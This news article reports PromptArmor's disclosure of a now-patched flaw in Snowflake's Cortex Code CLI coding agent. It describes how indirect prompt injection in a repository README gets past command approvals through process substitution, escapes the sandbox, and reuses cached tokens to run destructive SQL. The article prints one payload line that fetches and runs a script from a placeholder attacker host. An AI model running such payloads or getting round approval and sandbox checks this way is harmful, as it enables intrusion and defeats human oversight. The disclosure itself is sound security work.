Snowflake Cortex Code CLI flaw enabled prompt-injection malware

Snowflake has patched a critical Cortex Code CLI bug that let indirect prompt injection bypass command approvals and break out of the sandbox. PromptArmor says attackers could trigger remote code execution and reuse cached Snowflake tokens to run damaging SQL.

Snowflake Cortex Code CLI flaw enabled prompt-injection malware

TL;DR

  • Cortex Code CLI vulnerability: Broke human-in-the-loop approvals and sandboxed execution expectations in agentic CLIs
  • Exploit path: Indirect prompt injection from untrusted content (e.g., repo README) leading to RCE
  • Approval bypass: Process substitution <() not validated; unsafe payloads executed when wrapped in “safe” outer commands
  • Sandbox escape: Prompt-driven dangerously_disable_sandbox + approval bypass enabled immediate unsandboxed execution; disable flag setting mitigates
  • Token risk: Cached Snowflake auth tokens could be used to run SQL as the Cortex user; theft, table drops, backdoors, lockouts
  • Timeline and fix: Disclosed Feb 5, 2026; validated Feb 12; fixed in 1.0.25 (Feb 28, 2026); public Mar 16, 2026; ~50% efficacy in tests

Snowflake’s command-line coding agent, Snowflake Cortex Code CLI, shipped with a vulnerability that undercut two of the guardrails developers generally expect from agentic CLIs: human-in-the-loop command approvals and sandboxed execution. PromptArmor reports the issue was discovered two days after release, and Snowflake shipped a fix in Cortex Code CLI 1.0.25 on February 28, 2026, delivered via an automatic update when Cortex is next launched.

What Cortex Code is trying to do

Cortex Code CLI is positioned as a coding agent in the “Claude Code / Codex” mold, with an added integration for running SQL in Snowflake. As with other agentic developer tools, it supports sandbox modes intended to restrict file/network access and require approvals for risky commands.

Snowflake’s documentation describes how, in OS+Regular mode, commands should prompt for user approval, and the sandbox should constrain execution (with network and file access restrictions). PromptArmor’s write-up shows an attacker chain that can work even when the sandbox is enabled—and notes it also applied to non-sandbox users.

The attack chain: indirect prompt injection to RCE

The core scenario starts with indirect prompt injection hidden in untrusted content. In the example chain, the injection lives in a README inside an untrusted open-source repository. PromptArmor notes similar injections could be ingested from other untrusted data sources (web search results, database records, terminal output, or MCP responses).

A notable detail: PromptArmor points out Cortex does not support workspace trust, a convention used in many code editors and adopted by most agentic CLIs to warn about risky operations in unfamiliar directories.

From there, the agent’s subagent inspects the repo, encounters the injected instructions, and is manipulated into running a dangerous command.

Where approvals broke: process substitution wasn’t validated

PromptArmor attributes the approval bypass to a gap in Cortex’s command validation system: commands inside process substitution <() expressions were not evaluated. That allowed a malicious payload to run without triggering approvals, so long as it met two conditions:

  • Unsafe commands were placed within a process substitution expression
  • The overall command began with a command classified as “safe” by Cortex’s trust model

The example payload shown is:

cat < <(sh < <(wget -q0- [https://ATTACKER_URL.com/bugbot](https://ATTACKER_URL.com/bugbot)))

In this chain, wget retrieves a script from an attacker-controlled server and sh executes it—without the expected consent prompt.

Escaping the sandbox: a flag plus the approval bypass

The second guardrail failure involves sandboxing. PromptArmor reports Cortex can set a flag—dangerously_disable_sandbox—to request execution outside the sandbox for legitimate cases like network access or accessing files beyond the sandbox boundary.

The attack chain uses prompt injection to get the agent to set that flag. Combined with the process-substitution approval bypass, the result is that unsandboxed execution happens immediately, without a consent dialog.

PromptArmor notes there is a setting to disable this functionality, which would prevent this bypass path.

Why this gets dangerous fast: cached Snowflake tokens

Once an attacker has remote code execution on the victim’s machine, the blast radius extends beyond local damage. PromptArmor highlights that Cortex stores cached tokens used to authenticate to Snowflake, and a malicious script can find and use those cached credentials to run SQL with the privileges of the Cortex user.

Impacts described include:

  • Stealing database contents
  • Dropping tables
  • Adding backdoor users
  • Locking out legitimate users via network rules

The report also notes Snowflake defaults to and recommends browser-based authentication, and while users can restrict the role used for SQL, the Cortex program itself would still have access consistent with its session—meaning an attacker riding along gets the same.

Multi-agent context loss made the UI story worse

PromptArmor also describes a failure mode tied to multi-agent orchestration: during an execution that used multiple subagents, context was lost during handoffs. The main agent ultimately warned that a malicious command had been found and advised not to run it—while failing to inform that a second-level subagent had already executed the command.

It’s a reminder that in agentic tools, security posture isn’t only about command filters and sandboxes; it also hinges on whether the supervising agent can reliably report what delegated agents actually did.

Disclosure and fix timeline

PromptArmor reports responsible disclosure on Feb 5, 2026, Snowflake validated the issue on Feb 12, and the fix shipped in version 1.0.25 on Feb 28, 2026, with coordinated public disclosure on Mar 16, 2026. The report also notes the attack was stochastic in testing, with roughly 50% efficacy, underscoring how non-determinism complicates security testing and incident response for LLM-based systems.

Snowflake’s advisory is posted on the Snowflake Community Site: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Source: https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware

Continue the conversation on Slack

Did this article spark your interest? Join our community of experts and enthusiasts to dive deeper, ask questions, and share your ideas.

Join our community